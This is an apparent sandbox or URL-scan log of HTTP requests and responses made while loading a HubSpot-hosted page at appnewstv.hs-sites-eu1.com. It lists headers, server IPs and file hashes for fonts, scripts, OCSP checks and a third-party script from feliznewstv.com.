X-HubSpot-Correlation-Id: dfb0f4bb-a227-4485-b7d1-c6e49bce824d
Content-Encoding: gzip
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 3600
Access-Control-Allow-Origin: http://appnewstv.hs-sites-eu1.com
Last-Modified: Wed, 14 Sep 2022 13:43:27 GMT
CF-Cache-Status: EXPIRED
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 74acb65dcd4db50f-OSL


--- Additional Info ---
Magic:  ASCII text, with very long lines (546)
Size:   603
Md5:    03d95989ff54ea4abfa917d39db0f991
Sha1:   de66de20c2f7fe335691784dd1e440fbbabaaffb
Sha256: ca941b51a413c5556d7fbb6f3b4b53c507c12d62929b827bdf79b11f2ed86015
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Wed, 14 Sep 2022 22:03:22 GMT
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 22:12:56 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 96c778ce6156d12f24b8b6cdaa0cbf66.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: llIRbr4N7gsdQHOZ7LWhgQ0EBBJgZBTAbiFqsFvkCh37KumUWuuD8g==
Age: 3147


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
GET /hubfs/26246913/raw_assets/public/@marketplace/GiantFocal/Hatch_Landing/images/placeholder/image-02.jpg HTTP/1.1
Host: 26246913.fs1.hubspotusercontent-eu1.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
104.18.34.226
HTTP/1.1 200 OK
Content-Type: image/jpeg
X-HS-Alternate-Content-Type: text/plain
Date: Wed, 14 Sep 2022 22:55:49 GMT
Content-Length: 208912
Connection: keep-alive
CF-Ray: 74acb65ede73b4f3-OSL
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
ETag: "576c8bc261d879e5c7095993fa055911"
Last-Modified: Tue, 13 Sep 2022 13:51:23 GMT
Vary: Accept-Encoding
Via: 1.1 0562d7d213bde9a129ec458c631f9cee.cloudfront.net (CloudFront)
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
Cf-Bgj: imgq:85,h2pri
Cf-Polished: origSize=208920, status=webp_bigger
Edge-Cache-Tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
X-Amz-Cf-Id: mDqyHtOHIzO_qgXXNEX-kYj5maCnodTPy9QRW6ADQTUyaGlKDTWddA==
X-Amz-Cf-Pop: CPH50-C1
x-amz-id-2: TMJLjSWFnpVNG6PErGDCY637rzVM01XSn7rIc6Xcw3emZCzjMmwjLLRpKyERLTnoGPJwt4jJQ7o=
x-amz-meta-cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
x-amz-meta-created-unix-time-millis: 1663077082549
x-amz-meta-index-tag: none
x-amz-replication-status: COMPLETED
x-amz-request-id: HW3RG1JQ5A158BX7
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: a0xWrfJ3xzhrq6qQxYKJrHAsTUBXaOuy
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
X-Robots-Tag: none
Server: cloudflare


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1441, components 3\012- data
Size:   208912
Md5:    bfdc57caf64cf284e867df913fe185da
Sha1:   f7dcd78a87b1e123f9a2f9f55ec1d589c872768b
Sha256: f5e6d7ccd952d26615cf449d6548878465e7297a09175a9054ce2f53ba7d20fc
                                        
GET /cos-i18n/static-1.53/bundles/project.js HTTP/1.1
Host: static.hsappstatic.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
104.17.5.210
HTTP/2 200 OK
content-type: application/javascript
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 09 Nov 2021 16:12:42 GMT
etag: W/"61ca66de658cab9587e4636894680d5d"
x-amz-server-side-encryption: AES256
x-amz-version-id: P9ES7sOpFzrLl1QoRwjEAy5outPo5_GO
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 251aba405178d16c89041692c3261a47.cloudfront.net (CloudFront)
x-amz-cf-pop: HEL50-C1
x-amz-cf-id: 34g4n2oNRs8WvBEZGObRDrs6gH3jdmXpAmCs72tfRrSAm6YeuGEZUA==
cf-cache-status: HIT
age: 99597
expires: Thu, 14 Sep 2023 22:55:49 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=klK25aBMJxRY3sfVQ%2Bmjf4OcV9ZwZmtkPNhDzeFwhMotbD2%2BdJ8bD%2BlMIvlIwK3rPtMlzczimL9dnS5xHBg6wA%2Bq39r0L9nSmZt1XEfbiNqVkCBoujuwkLPZhoKr7JIuJ5m%2Byxa49j4%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb65dccc2b50b-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1243), with no line terminators
Size:   989
Md5:    262d0296781894e4f487ba4025434d71
Sha1:   4314fdd798320df09b17310ab3d3f4bf655b64e2
Sha256: d0465077b9b6acbc7d32c22ea37c0f1b97abf2da45812ad5137b244b13d073f7
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 14 Sep 2022 22:55:49 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /hub/-1/hub_generated/module_assets/-2712622/1663012019885/module_-2712622_Site_Search_Input.min.css HTTP/1.1
Host: cdn2.hubspot.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
104.17.244.204
HTTP/2 200 OK
content-type: text/css
x-hs-alternate-content-type: text/plain
date: Wed, 14 Sep 2022 22:55:49 GMT
cf-ray: 74acb65d9b1cb4eb-OSL
access-control-allow-origin: *
age: 183372
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"c708989561e0cdbfcf996d1b7f47482c"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019885
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4HSqj5RGgtjtT0iDgNk81rIL9blEUeMl97D9uLHWKZBEASOriUn3IlLW0ZSybJL7%2Fn9OsLh96GeL7S5f2B6R6AzMl%2FT5uSP0VNoiQ%2BIUuQaP5bY4ns41xzNhTgZaWvj%2FKVU%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (612), with no line terminators
Size:   1728
Md5:    6714676055c6958051379245dac0b88b
Sha1:   a00414e1213ea21d33ce758b58faee4462921987
Sha256: 1e548e16950fc45b5b0f1bebefa25added53bf557c4a531c4d337d1954e47500
                                        
GET /cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css HTTP/1.1
Host: static.hsappstatic.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
104.17.5.210
HTTP/1.1 301 Moved Permanently
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 23:55:49 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cOCDr8gPCIGisVJjOoPAzE9I%2BJD%2BGqUuPBTkXdeiaBPVDHLoGHQt%2FZD%2FHeJEJG0UZu7gx86lTs6P1WgbiqFh62MsyeugNrj0cUDlO4IqEC5Wk8npGrAVdd3Td1%2FyDiJTE3YBdeLTqfA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74acb6601f31b523-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
GET /s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15744
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:34:08 GMT
expires: Thu, 14 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 12101
last-modified: Wed, 11 May 2022 19:24:48 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15744, version 1.0\012- data
Size:   15744
Md5:    15d9f621c3bd1599f0169dcf0bd5e63e
Sha1:   7ca9c5967f3bb8bffeab24b639b49c1e7d03fa52
Sha256: f6734f8177112c0839b961f96d813fcb189d81b60e96c33278c1983b6f419615
                                        
GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15860
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:34:08 GMT
expires: Thu, 14 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 12101
last-modified: Wed, 11 May 2022 19:24:42 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15860, version 1.0\012- data
Size:   15860
Md5:    e9f5aaf547f165386cd313b995dddd8e
Sha1:   acdef5603c2387b0e5bffd744b679a24a8bc1968
Sha256: f5aebdfea35d1e7656ef4acc5db1f243209755ae3300943ef8fc6280f363c860
                                        
GET /cms-free-branding-lib/static-1.111/assets/sprocket_white.svg HTTP/1.1
Host: static.hsappstatic.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
104.17.5.210
HTTP/1.1 301 Moved Permanently
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 23:55:49 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/assets/sprocket_white.svg
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z%2BI6pixRlg2dPC0upEciAw81%2FEKSJVMoawBLSRrtp7D%2FZnIOp%2BsoSCetFPU6tT8NnqJUbhEX%2Ba%2FlTGtCY1XGJfe368B7%2FCc1y9DXifNokGhbP5TUo%2B99%2FEshVixTWqKc99szOEdey54%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74acb6601f35b4f3-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 1903
Cache-Control: 'max-age=158059'
Date: Wed, 14 Sep 2022 22:55:49 GMT
Last-Modified: Wed, 14 Sep 2022 22:24:06 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
GET /collectedforms.js HTTP/1.1
Host: js-eu1.hscollectedforms.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
172.65.192.122
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
date: Wed, 14 Sep 2022 22:55:49 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Tue, 13 Sep 2022 10:41:10 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 5afLcxIjU5LfvvyyfvxzjsWXufXHSL1t
etag: W/"7a468b833be86c01bc8dfd455308f792"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 507b5edb20d0e1a0b73c8687f53defa8.cloudfront.net (CloudFront)
x-amz-cf-pop: FRA6-C1
x-amz-cf-id: 4x15r2QQ2poDiSr4Je3RAtQzJ4Vy6FcuxkEt7Yfp8x95RIzj5HGquw==
cache-control: s-maxage=86400, max-age=0
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://exceptions.hubspot.com/csp/report?resource=collected-forms-embed-js/static-1.292/bundles/project.js&cfRay=74a506dec96b9930-FRA
x-hs-target-asset: collected-forms-embed-js/static-1.292/bundles/project.js
x-hs-cache-status: MISS
cache-tag: staticjsapp-collected-forms-embed-js-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 80589
server: cloudflare
cf-ray: 74acb6607be71695-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
Size:   23612
Md5:    0acc6381f56a31e22bfb6ebdc9ea8561
Sha1:   c5aa2bce64d4bb4da9bb4a79f61df3e869af5153
Sha256: 4652ac18f49933b5447fd610e568fc82096bcb6c369e8b0cf5bfebbf0c42d6d7
                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "09A40458A8D09F4A00A80574A0D404CB719DBC66709FDFF0E426035C6CEDC4F1"
Last-Modified: Wed, 14 Sep 2022 04:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21533
Expires: Thu, 15 Sep 2022 04:54:42 GMT
Date: Wed, 14 Sep 2022 22:55:49 GMT
Connection: keep-alive

                                        
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: ZV+Dd2Aa+H1V0kCaLEviuA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
34.213.140.56
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 78c4XyF82SycxOQUkeY24DOCplE=

                                        
GET /content-tools-menu/api/v1/tools-menu/has-permission?portalId=26246913&callback=jsonpHandler HTTP/1.1
Host: app-eu1.hubspot.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
172.65.236.181
HTTP/2 204 No Content
date: Wed, 14 Sep 2022 22:55:50 GMT
cf-ray: 74acb66289ec9912-ARN
cache-control: max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
cf-cache-status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://exceptions.hubspot.com/csp/reports?cfRay=74acb66289ec9912&resource=unknown"}]}
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: 30c1589a-f181-456c-9e41-138f8faba0f6
x-trace: 2BF88E2DE9262F9AA09580B9FFE3C3B2D4EC1A5DBE000000000000000000
set-cookie: __cf_bm=Y2MLbJusjRiDNvEg9VsW_wkB_JF06oyN4bbNsqXI4M4-1663196150-0-AdkPcbbR3iUFEKTkCxoYnO3JY2TQ8+gFF4IFmDC+QD8DAysDP9QU1fnUKGSvVjxpudZ/CMONipTyeQPeYmEr5Mg=; path=/; expires=Wed, 14-Sep-22 23:25:50 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

                                        
GET /collected-forms/v1/config/json?portalId=26246913&utk= HTTP/1.1
Host: forms-eu1.hubspot.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
172.65.193.34
HTTP/2 200 OK
content-type: application/json;charset=utf-8
date: Wed, 14 Sep 2022 22:55:50 GMT
vary: Accept-Encoding
x-hubspot-correlation-id: 652c010d-be0c-413e-a57e-283138638f3d
access-control-allow-credentials: false
access-control-allow-origin: http://appnewstv.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: *
access-control-max-age: 180
x-robots-tag: none
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=5N14iTYXl4CIaiHdGbPnzh5.FqiwwuOiQYLwD_L5hEg-1663196150-0-ARSwP5JfRvKx5QwxGP66DLQ50tpo/RV1dqoxDZ6L8IdRNcQ509vBOHt8uAIX0EYm6BgWTeAf3StVb/VAur4b/lU=; path=/; expires=Wed, 14-Sep-22 23:25:50 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ol518o0mGZCa6DCcHMUOk%2B6GG%2FJTasmuQLIovPttgT5Q4tBAftR1D50mTtIGvjWLM5r2m7wrsptUIu6g1goBJLkBqzIZ2apqYCvFGwreZ%2BBE9JT%2FQyOQ3XVYrWmTrth2hpIl%2B2KheA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb661594a95ee-ARN
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   8946
Md5:    14e19cde0b5c9bd481e6bd7e09d4fc18
Sha1:   4d60fe4a88ad34edfe6e6e204ec6c794206d5d26
Sha256: d9d3fedbefe32d5b4f2463de52ba21d58b78bcced538632b870b6cf9ac08876e
                                        
GET /?api=1&lan=twthk&ht=2&counter0=josvip222 HTTP/1.1
Host: feliznewstv.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
Server: nginx
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=s2pfvjs789l0b729lp8al927tb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (63717), with CRLF line terminators
Size:   512224
Md5:    9bba01d1d9085b86dc859903c9996c66
Sha1:   5ee01822118fcbed4f406e2273b10d1d607046ef
Sha256: bac95180b9d023e31413d3c4fe1722de075dcbd9c063d2e9a6f35eadce592b06
                                        
GET /cms-free-branding-lib/static-1.111/js/index.js HTTP/1.1
Host: static.hsappstatic.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
104.17.5.210
HTTP/2 200 OK
content-type: application/javascript
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 12 Jul 2022 20:24:02 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: UeMu8WOMDUthADLLgqZZZU3H9mISgOsX
etag: W/"29a15a515ef5e383fba2c6d65b1de499"
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 60d22b5ab79521d827fcdd546c7710d4.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: -KuTJcFYSjo9F4GglqsT_-vXHaNSY_Z_DAQD2EJCoeEMmw1nPJ3ipg==
cf-cache-status: HIT
age: 1470791
expires: Thu, 14 Sep 2023 22:55:49 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LXtVK5Dl7YggckiNaOMkJVV81j7MFG9ouX%2FxilGIXy8aNiuCJJpslufvObIjUUnr8ZXl81fzED2nTvChk7p0wOEmreg%2FUL9npJse95G%2FcmD7ac%2FlqKacGeYKqbXOVMtSfI9zQJwFGWc%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb65ddcc3b50b-OSL
